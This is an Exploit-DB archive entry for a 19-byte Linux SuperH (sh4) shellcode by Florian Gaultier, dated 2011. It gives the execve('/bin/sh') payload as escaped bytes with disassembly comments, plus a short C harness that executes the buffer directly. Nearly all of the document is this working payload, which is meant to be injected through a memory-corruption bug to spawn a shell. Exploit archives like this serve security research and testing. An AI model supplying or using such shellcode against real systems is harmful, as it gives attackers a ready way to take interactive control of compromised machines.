Linux/SuperH (sh4) - execve("/bin/sh", 0, 0) Shellcode (19 bytes)

EDB-ID:

43541

CVE:

N/A




Platform:

SuperH_SH4

Date:

2011-06-22


/*
 | Title:     Linux/SuperH - sh4 execve("/bin/sh", 0, 0) - 19 bytes
 | Date:      2011-06-22
 | Tested on: Debian-sh4 2.6.32-5-sh7751r
 | Author:    Florian Gaultier - agix - twitter: @Agixid
 |
 | http://shell-storm.org
*/

#include <string.h>
#include <stdio.h>

int main(){
char shell[] =
		"\x0b\xe3"//           mov     #11,r3
		"\x02\xc7"//           mova    @(10,pc),r0
		"\x03\x64"//           mov     r0,r4
		"\x5a\x25"//           xor     r5,r5
		"\x6a\x26"//           xor     r6,r6
		"\x02\xc3"//           trapa   #2
		"/bin/sh";

printf("[*] Taille du ShellCode = %d\n", strlen(shell));
(*(void (*)()) shell)();

return 0;
}